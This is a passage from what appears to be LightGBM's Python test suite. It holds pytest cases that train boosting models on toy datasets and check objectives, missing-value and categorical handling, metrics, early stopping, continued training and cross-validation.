    return ('decreasing_metric', next(decreasing_generator), False)
def categorize(continuous_x):
    """Map values to integer bucket ids using 0.01-wide bins over [0, 1)."""
    boundaries = np.arange(0, 1, 0.01)
    return np.digitize(continuous_x, bins=boundaries)
def test_binary():
    """Binary classification smoke test; also checks that ``num_iteration``
    in the params dict overrides ``num_boost_round``."""
    X, y = load_breast_cancer(return_X_y=True)
    X_fit, X_holdout, y_fit, y_holdout = train_test_split(X, y, test_size=0.1, random_state=42)
    params = dict(
        objective='binary',
        metric='binary_logloss',
        verbose=-1,
        num_iteration=50  # test num_iteration in dict here
    )
    dtrain = lgb.Dataset(X_fit, y_fit)
    dvalid = lgb.Dataset(X_holdout, y_holdout, reference=dtrain)
    history = {}
    booster = lgb.train(params, dtrain,
                        num_boost_round=20,
                        valid_sets=dvalid,
                        verbose_eval=False,
                        evals_result=history)
    loss = log_loss(y_holdout, booster.predict(X_holdout))
    assert loss < 0.14
    # num_iteration from params (50) wins over num_boost_round (20)
    assert len(history['valid_0']['binary_logloss']) == 50
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
def test_rf():
    """Random-forest boosting mode must produce a reasonable binary model."""
    X, y = load_breast_cancer(return_X_y=True)
    X_fit, X_holdout, y_fit, y_holdout = train_test_split(X, y, test_size=0.1, random_state=42)
    params = dict(
        boosting_type='rf',
        objective='binary',
        bagging_freq=1,          # rf mode requires bagging on every iteration
        bagging_fraction=0.5,
        feature_fraction=0.5,
        num_leaves=50,
        metric='binary_logloss',
        verbose=-1
    )
    dtrain = lgb.Dataset(X_fit, y_fit)
    dvalid = lgb.Dataset(X_holdout, y_holdout, reference=dtrain)
    history = {}
    forest = lgb.train(params, dtrain,
                       num_boost_round=50,
                       valid_sets=dvalid,
                       verbose_eval=False,
                       evals_result=history)
    loss = log_loss(y_holdout, forest.predict(X_holdout))
    assert loss < 0.19
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
def test_regression():
    """Regression smoke test on the Boston housing data."""
    X, y = load_boston(return_X_y=True)
    X_fit, X_holdout, y_fit, y_holdout = train_test_split(X, y, test_size=0.1, random_state=42)
    params = dict(metric='l2', verbose=-1)
    dtrain = lgb.Dataset(X_fit, y_fit)
    dvalid = lgb.Dataset(X_holdout, y_holdout, reference=dtrain)
    history = {}
    model = lgb.train(params, dtrain,
                      num_boost_round=50,
                      valid_sets=dvalid,
                      verbose_eval=False,
                      evals_result=history)
    mse = mean_squared_error(y_holdout, model.predict(X_holdout))
    assert mse < 7
    assert history['valid_0']['l2'][-1] == pytest.approx(mse)
def test_missing_value_handle():
    """NaN entries must be usable as a predictive signal on their own."""
    X = np.zeros((100, 1))
    y = np.zeros(100)
    # mark 20 random rows with NaN and give them label 1 — NaN perfectly
    # identifies the positive class
    for idx in random.sample(range(100), 20):
        X[idx, 0] = np.nan
        y[idx] = 1
    dtrain = lgb.Dataset(X, y)
    dvalid = lgb.Dataset(X, y)
    params = dict(metric='l2', verbose=-1, boost_from_average=False)
    history = {}
    booster = lgb.train(params, dtrain,
                        num_boost_round=20,
                        valid_sets=dvalid,
                        verbose_eval=False,
                        evals_result=history)
    err = mean_squared_error(y, booster.predict(X))
    assert err < 0.005
    assert history['valid_0']['l2'][-1] == pytest.approx(err)
def test_missing_value_handle_more_na():
    """Same as test_missing_value_handle but with NaN as the majority value
    (80 of 100 rows), so the non-missing bin is the minority."""
    X_train = np.ones((100, 1))
    y_train = np.ones(100)
    trues = random.sample(range(100), 80)
    for idx in trues:
        X_train[idx, 0] = np.nan
        y_train[idx] = 0
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    params = {
        'metric': 'l2',
        'verbose': -1,
        'boost_from_average': False
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=20,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    ret = mean_squared_error(y_train, gbm.predict(X_train))
    assert ret < 0.005
    assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle_na():
    """With ``zero_as_missing=False`` only the NaN row is treated as missing;
    a single tree must be able to fit this toy pattern exactly."""
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [1, 1, 1, 1, 0, 0, 0, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'zero_as_missing': False
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=1,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    pred = gbm.predict(X_train)
    # one boosting round with learning_rate=1 reproduces the labels exactly
    np.testing.assert_allclose(pred, y)
    ret = roc_auc_score(y_train, pred)
    assert ret > 0.999
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_zero():
    """With ``zero_as_missing=True`` both 0 and NaN map to the missing bin,
    so their labels (both 0 here) must be predicted identically."""
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'zero_as_missing': True
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=1,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    pred = gbm.predict(X_train)
    # one boosting round with learning_rate=1 reproduces the labels exactly
    np.testing.assert_allclose(pred, y)
    ret = roc_auc_score(y_train, pred)
    assert ret > 0.999
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_none():
    """With 'use_missing' disabled, NaN rows cannot get a dedicated branch, so
    the model only reaches moderate AUC on this toy dataset."""
    x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
    y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'use_missing': False
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=1,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    pred = gbm.predict(X_train)
    # without missing handling the NaN row (last) predicts the same as the
    # low-value rows at the start
    assert pred[0] == pytest.approx(pred[1])
    assert pred[-1] == pytest.approx(pred[0])
    ret = roc_auc_score(y_train, pred)
    assert ret > 0.83
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle():
    """A single categorical column (with one-hot splits via max_cat_to_onehot)
    must fit this alternating-label toy dataset exactly in one round."""
    x = [0, 1, 2, 3, 4, 5, 6, 7]
    y = [0, 1, 0, 1, 0, 1, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    # permissive limits so every category can form its own split
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': True,
        'categorical_column': 0
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=1,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    pred = gbm.predict(X_train)
    # one boosting round is enough to reproduce the labels exactly
    np.testing.assert_allclose(pred, y)
    ret = roc_auc_score(y_train, pred)
    assert ret > 0.999
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle_na():
    """NaN values in a categorical column must be separable from category 0:
    labels alternate with NaN, and the model must fit them exactly."""
    x = [0, np.nan, 0, np.nan, 0, np.nan]
    y = [0, 1, 0, 1, 0, 1]
    X_train = np.array(x).reshape(len(x), 1)
    y_train = np.array(y)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_eval = lgb.Dataset(X_train, y_train)
    # permissive limits so every category can form its own split
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': False,
        'categorical_column': 0
    }
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=1,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    pred = gbm.predict(X_train)
    # one boosting round is enough to reproduce the labels exactly
    np.testing.assert_allclose(pred, y)
    ret = roc_auc_score(y_train, pred)
    assert ret > 0.999
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_non_zero_inputs():
    """Categorical codes that never take the value 0 must still split cleanly."""
    features = np.array([1, 1, 1, 1, 1, 1, 2, 2]).reshape(-1, 1)
    labels = np.array([1, 1, 1, 1, 1, 1, 0, 0])
    train_set = lgb.Dataset(features, labels)
    valid_set = lgb.Dataset(features, labels)
    # permissive limits so a single round can separate the two categories
    params = {
        'objective': 'regression',
        'metric': 'auc',
        'verbose': -1,
        'boost_from_average': False,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'min_data_per_group': 1,
        'cat_smooth': 1,
        'cat_l2': 0,
        'max_cat_to_onehot': 1,
        'zero_as_missing': False,
        'categorical_column': 0
    }
    evals_result = {}
    booster = lgb.train(params, train_set,
                        num_boost_round=1,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        evals_result=evals_result)
    preds = booster.predict(features)
    # one boosting round is enough to reproduce the labels exactly
    np.testing.assert_allclose(preds, labels)
    auc = roc_auc_score(labels, preds)
    assert auc > 0.999
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['auc'][-1] == pytest.approx(auc)
def test_multiclass():
    """Softmax training on digits reaches low multi-logloss, and the logged
    eval history agrees with an independent computation."""
    X, y = load_digits(n_class=10, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 10,
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, params=params)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set, params=params)
    evals_result = {}
    booster = lgb.train(params, train_set,
                        num_boost_round=50,
                        valid_sets=valid_set,
                        verbose_eval=False,
                        evals_result=evals_result)
    loss = multi_logloss(y_test, booster.predict(X_test))
    assert loss < 0.16
    assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(loss)
def test_multiclass_rf():
    """Random-forest mode ('rf' boosting with bagging + feature subsampling)
    reaches reasonable multi-logloss on the digits dataset."""
    X, y = load_digits(n_class=10, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'boosting_type': 'rf',
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'bagging_freq': 1,
        'bagging_fraction': 0.6,
        'feature_fraction': 0.6,
        'num_class': 10,
        'num_leaves': 50,
        'min_data': 1,
        'verbose': -1,
        # NOTE(review): presumably double precision keeps the result stable
        # enough on GPU builds to meet the threshold below — confirm
        'gpu_use_dp': True
    }
    lgb_train = lgb.Dataset(X_train, y_train, params=params)
    lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params)
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=50,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result)
    ret = multi_logloss(y_test, gbm.predict(X_test))
    assert ret < 0.23
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_multiclass_prediction_early_stopping():
    """Aggressive prediction-time early stopping degrades loss; a stricter
    (larger) margin brings it close to the full-model result."""
    X, y = load_digits(n_class=10, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 10,
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X_train, y_train, params=params)
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=50)
    pred_parameter = {"pred_early_stop": True,
                      "pred_early_stop_freq": 5,
                      "pred_early_stop_margin": 1.5}
    ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
    assert ret < 0.8
    assert ret > 0.6  # loss will be higher than when evaluating the full model
    # a larger margin makes early stopping stricter, so loss drops back down
    pred_parameter["pred_early_stop_margin"] = 5.5
    ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
    assert ret < 0.2
def test_multi_class_error():
    """multi_error metric: default equals top-1, and the top-k variants match an
    independent `top_k_error` computation, including tie-breaking on equal preds."""
    X, y = load_digits(n_class=10, return_X_y=True)
    params = {'objective': 'multiclass', 'num_classes': 10, 'metric': 'multi_error',
              'num_leaves': 4, 'verbose': -1}
    lgb_data = lgb.Dataset(X, label=y)
    est = lgb.train(params, lgb_data, num_boost_round=10)
    predict_default = est.predict(X)
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=1), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_1 = est.predict(X)
    # check that default gives same result as k = 1
    np.testing.assert_allclose(predict_1, predict_default)
    # check against independent calculation for k = 1
    err = top_k_error(y, predict_1, 1)
    assert results['training']['multi_error'][-1] == pytest.approx(err)
    # check against independent calculation for k = 2
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_2 = est.predict(X)
    err = top_k_error(y, predict_2, 2)
    assert results['training']['multi_error@2'][-1] == pytest.approx(err)
    # check against independent calculation for k = 10
    results = {}
    est = lgb.train(dict(params, multi_error_top_k=10), lgb_data, num_boost_round=10,
                    valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    predict_3 = est.predict(X)
    err = top_k_error(y, predict_3, 10)
    assert results['training']['multi_error@10'][-1] == pytest.approx(err)
    # check cases where predictions are equal
    X = np.array([[0, 0], [0, 0]])
    y = np.array([0, 1])
    lgb_data = lgb.Dataset(X, label=y)
    params['num_classes'] = 2
    results = {}
    lgb.train(params, lgb_data, num_boost_round=10,
              valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    # with top-1 and tied predictions at least one class is always wrong
    assert results['training']['multi_error'][-1] == pytest.approx(1)
    results = {}
    lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
              valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
    # top-2 over 2 classes can never be wrong
    assert results['training']['multi_error@2'][-1] == pytest.approx(0)
def test_auc_mu():
    """auc_mu metric: matches binary AUC for 2 classes, is 0.5 on constant
    predictions, responds to sample weights and auc_mu_weights, and reaches 1
    when accuracy is perfect."""
    # should give same result as binary auc for 2 classes
    X, y = load_digits(n_class=10, return_X_y=True)
    y_new = np.zeros((len(y)))
    y_new[y != 0] = 1
    lgb_X = lgb.Dataset(X, label=y_new)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'verbose': -1,
              'num_classes': 2,
              'seed': 0}
    results_auc_mu = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
    params = {'objective': 'binary',
              'metric': 'auc',
              'verbose': -1,
              'seed': 0}
    results_auc = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc)
    np.testing.assert_allclose(results_auc_mu['training']['auc_mu'], results_auc['training']['auc'])
    # test the case where all predictions are equal
    # min_data_in_leaf=20 on 10 rows prevents any split, forcing constant output
    lgb_X = lgb.Dataset(X[:10], label=y_new[:10])
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'verbose': -1,
              'num_classes': 2,
              'min_data_in_leaf': 20,
              'seed': 0}
    results_auc_mu = {}
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
    assert results_auc_mu['training']['auc_mu'][-1] == pytest.approx(0.5)
    # test that weighted data gives different auc_mu
    lgb_X = lgb.Dataset(X, label=y)
    lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.abs(np.random.normal(size=y.shape)))
    results_unweighted = {}
    results_weighted = {}
    params = dict(params, num_classes=10, num_leaves=5)
    lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_unweighted)
    lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
              evals_result=results_weighted)
    assert results_weighted['training']['auc_mu'][-1] < 1
    assert results_unweighted['training']['auc_mu'][-1] != results_weighted['training']['auc_mu'][-1]
    # test that equal data weights give same auc_mu as unweighted data
    lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.ones(y.shape) * 0.5)
    lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
              evals_result=results_weighted)
    assert results_unweighted['training']['auc_mu'][-1] == pytest.approx(
        results_weighted['training']['auc_mu'][-1], abs=1e-5)
    # should give 1 when accuracy = 1
    X = X[:10, :]
    y = y[:10]
    lgb_X = lgb.Dataset(X, label=y)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'num_classes': 10,
              'min_data_in_leaf': 1,
              'verbose': -1}
    results = {}
    lgb.train(params, lgb_X, num_boost_round=100, valid_sets=[lgb_X], evals_result=results)
    assert results['training']['auc_mu'][-1] == pytest.approx(1)
    # test loading class weights
    Xy = np.loadtxt(
        str(Path(__file__).absolute().parents[2] / 'examples' / 'multiclass_classification' / 'multiclass.train')
    )
    y = Xy[:, 0]
    X = Xy[:, 1:]
    lgb_X = lgb.Dataset(X, label=y)
    params = {'objective': 'multiclass',
              'metric': 'auc_mu',
              'auc_mu_weights': [0, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0],
              'num_classes': 5,
              'verbose': -1,
              'seed': 0}
    results_weight = {}
    lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_weight)
    # empty auc_mu_weights means the default weighting; results must differ
    params['auc_mu_weights'] = []
    results_no_weight = {}
    lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_no_weight)
    assert results_weight['training']['auc_mu'][-1] != results_no_weight['training']['auc_mu'][-1]
def test_ranking_prediction_early_stopping():
    """Prediction-time early stopping must actually change ranking outputs when
    the margin changes."""
    rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
    X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
    q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
    X_test, _ = load_svmlight_file(str(rank_example_dir / 'rank.test'))
    params = {
        'objective': 'rank_xendcg',
        'verbose': -1
    }
    train_set = lgb.Dataset(X_train, y_train, group=q_train, params=params)
    booster = lgb.train(params, train_set, num_boost_round=50)
    predict_kwargs = {"pred_early_stop": True,
                      "pred_early_stop_freq": 5,
                      "pred_early_stop_margin": 1.5}
    loose_margin_pred = booster.predict(X_test, **predict_kwargs)
    predict_kwargs["pred_early_stop_margin"] = 5.5
    strict_margin_pred = booster.predict(X_test, **predict_kwargs)
    # the two margins must not produce identical predictions
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(loose_margin_pred, strict_margin_pred)
def test_early_stopping():
    """Early stopping never triggers within 10 rounds but trims a 40-round run,
    and best_score is keyed by the custom validation-set name."""
    X, y = load_breast_cancer(return_X_y=True)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1
    }
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    train_set = lgb.Dataset(X_train, y_train)
    valid_set = lgb.Dataset(X_test, y_test, reference=train_set)
    valid_set_name = 'valid_set'

    def fit(num_rounds):
        # shared training call; only the round budget varies
        return lgb.train(params, train_set,
                         num_boost_round=num_rounds,
                         valid_sets=valid_set,
                         valid_names=valid_set_name,
                         verbose_eval=False,
                         early_stopping_rounds=5)

    # no early stopping
    booster = fit(10)
    assert booster.best_iteration == 10
    assert valid_set_name in booster.best_score
    assert 'binary_logloss' in booster.best_score[valid_set_name]
    # early stopping occurs
    booster = fit(40)
    assert booster.best_iteration <= 39
    assert valid_set_name in booster.best_score
    assert 'binary_logloss' in booster.best_score[valid_set_name]
def test_continue_train():
    """Training resumes from a saved model file, and a custom feval that mirrors
    the built-in l1 metric records an identical eval history."""
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'regression',
        'metric': 'l1',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
    lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
    init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
    model_name = 'model.txt'
    init_gbm.save_model(model_name)
    evals_result = {}
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=30,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    # test custom eval metrics
                    feval=(lambda p, d: ('custom_mae', mean_absolute_error(p, d.get_label()), False)),
                    evals_result=evals_result,
                    init_model='model.txt')
    ret = mean_absolute_error(y_test, gbm.predict(X_test))
    assert ret < 2.0
    assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
    # l1 and custom_mae compute the same quantity, so histories must match
    np.testing.assert_allclose(evals_result['valid_0']['l1'], evals_result['valid_0']['custom_mae'])
def test_continue_train_reused_dataset():
    """The same Dataset object can seed several incremental training sessions,
    accumulating iterations across them."""
    X, y = load_boston(return_X_y=True)
    params = {
        'objective': 'regression',
        'verbose': -1
    }
    train_set = lgb.Dataset(X, y, free_raw_data=False)
    booster = lgb.train(params, train_set, num_boost_round=5)
    # three more 5-round continuations on the same Dataset object
    for _ in range(3):
        booster = lgb.train(params, train_set, num_boost_round=5, init_model=booster)
    # 4 sessions x 5 rounds
    assert booster.current_iteration() == 20
def test_continue_train_dart():
    """Training can resume from an in-memory model when using DART boosting."""
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'boosting_type': 'dart',
        'objective': 'regression',
        'metric': 'l1',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
    lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
    init_gbm = lgb.train(params, lgb_train, num_boost_round=50)
    evals_result = {}
    # continue for another 50 rounds from the in-memory booster
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=50,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result,
                    init_model=init_gbm)
    ret = mean_absolute_error(y_test, gbm.predict(X_test))
    assert ret < 2.0
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
def test_continue_train_multiclass():
    """Training can resume from an in-memory model for multiclass objectives."""
    X, y = load_iris(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'metric': 'multi_logloss',
        'num_class': 3,
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X_train, y_train, params=params, free_raw_data=False)
    lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params, free_raw_data=False)
    init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
    evals_result = {}
    # continue for another 30 rounds from the in-memory booster
    gbm = lgb.train(params, lgb_train,
                    num_boost_round=30,
                    valid_sets=lgb_eval,
                    verbose_eval=False,
                    evals_result=evals_result,
                    init_model=init_gbm)
    ret = multi_logloss(y_test, gbm.predict(X_test))
    assert ret < 0.1
    # logged eval history must agree with an independent computation
    assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_cv():
    """Exercises lgb.cv: metric override via `metrics`, shuffling, callbacks,
    eval_train_metric, generator vs splitter `folds`, and lambdarank CV."""
    X_train, y_train = load_boston(return_X_y=True)
    params = {'verbose': -1}
    lgb_train = lgb.Dataset(X_train, y_train)
    # shuffle = False, override metric in params
    params_with_metric = {'metric': 'l2', 'verbose': -1}
    cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
                    nfold=3, stratified=False, shuffle=False,
                    metrics='l1', verbose_eval=False)
    # `metrics` argument replaces the metric from params entirely
    assert 'l1-mean' in cv_res
    assert 'l2-mean' not in cv_res
    assert len(cv_res['l1-mean']) == 10
    # shuffle = True, callbacks
    cv_res = lgb.cv(params, lgb_train, num_boost_round=10, nfold=3, stratified=False, shuffle=True,
                    metrics='l1', verbose_eval=False,
                    callbacks=[lgb.reset_parameter(learning_rate=lambda i: 0.1 - 0.001 * i)])
    assert 'l1-mean' in cv_res
    assert len(cv_res['l1-mean']) == 10
    # enable display training loss
    cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
                    nfold=3, stratified=False, shuffle=False,
                    metrics='l1', verbose_eval=False, eval_train_metric=True)
    assert 'train l1-mean' in cv_res
    assert 'valid l1-mean' in cv_res
    assert 'train l2-mean' not in cv_res
    assert 'valid l2-mean' not in cv_res
    assert len(cv_res['train l1-mean']) == 10
    assert len(cv_res['valid l1-mean']) == 10
    # self defined folds
    tss = TimeSeriesSplit(3)
    folds = tss.split(X_train)
    # passing a pre-built generator and the splitter object must be equivalent
    cv_res_gen = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=folds,
                        verbose_eval=False)
    cv_res_obj = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=tss,
                        verbose_eval=False)
    np.testing.assert_allclose(cv_res_gen['l2-mean'], cv_res_obj['l2-mean'])
    # LambdaRank
    rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
    X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
    q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
    params_lambdarank = {'objective': 'lambdarank', 'verbose': -1, 'eval_at': 3}
    lgb_train = lgb.Dataset(X_train, y_train, group=q_train)
    # ... with l2 metric
    cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
                           metrics='l2', verbose_eval=False)
    assert len(cv_res_lambda) == 2
    assert not np.isnan(cv_res_lambda['l2-mean']).any()
    # ... with NDCG (default) metric
    cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
                           verbose_eval=False)
    assert len(cv_res_lambda) == 2
    assert not np.isnan(cv_res_lambda['ndcg@3-mean']).any()
    # self defined folds with lambdarank
    cv_res_lambda_obj = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10,
                               folds=GroupKFold(n_splits=3),
                               verbose_eval=False)
    np.testing.assert_allclose(cv_res_lambda['ndcg@3-mean'], cv_res_lambda_obj['ndcg@3-mean'])
def test_cvbooster():
    """return_cvbooster=True yields a CVBooster with one Booster per fold whose
    averaged predictions score well; best_iteration is -1 without early stopping."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
    }
    lgb_train = lgb.Dataset(X_train, y_train)
    # with early stopping
    cv_res = lgb.cv(params, lgb_train,
                    num_boost_round=25,
                    early_stopping_rounds=5,
                    verbose_eval=False,
                    nfold=3,
                    return_cvbooster=True)
    assert 'cvbooster' in cv_res
    cvb = cv_res['cvbooster']
    assert isinstance(cvb, lgb.CVBooster)
    assert isinstance(cvb.boosters, list)
    # one booster per fold
    assert len(cvb.boosters) == 3
    assert all(isinstance(bst, lgb.Booster) for bst in cvb.boosters)
    assert cvb.best_iteration > 0
    # predict by each fold booster
    preds = cvb.predict(X_test, num_iteration=cvb.best_iteration)
    assert isinstance(preds, list)
    assert len(preds) == 3
    # fold averaging
    avg_pred = np.mean(preds, axis=0)
    ret = log_loss(y_test, avg_pred)
    assert ret < 0.13
    # without early stopping
    cv_res = lgb.cv(params, lgb_train,
                    num_boost_round=20,
                    verbose_eval=False,
                    nfold=3,
                    return_cvbooster=True)
    cvb = cv_res['cvbooster']
    # sentinel value when early stopping never ran
    assert cvb.best_iteration == -1
    preds = cvb.predict(X_test)
    avg_pred = np.mean(preds, axis=0)
    ret = log_loss(y_test, avg_pred)
    assert ret < 0.15
def test_feature_name():
    """Feature names round-trip through training, and names containing spaces
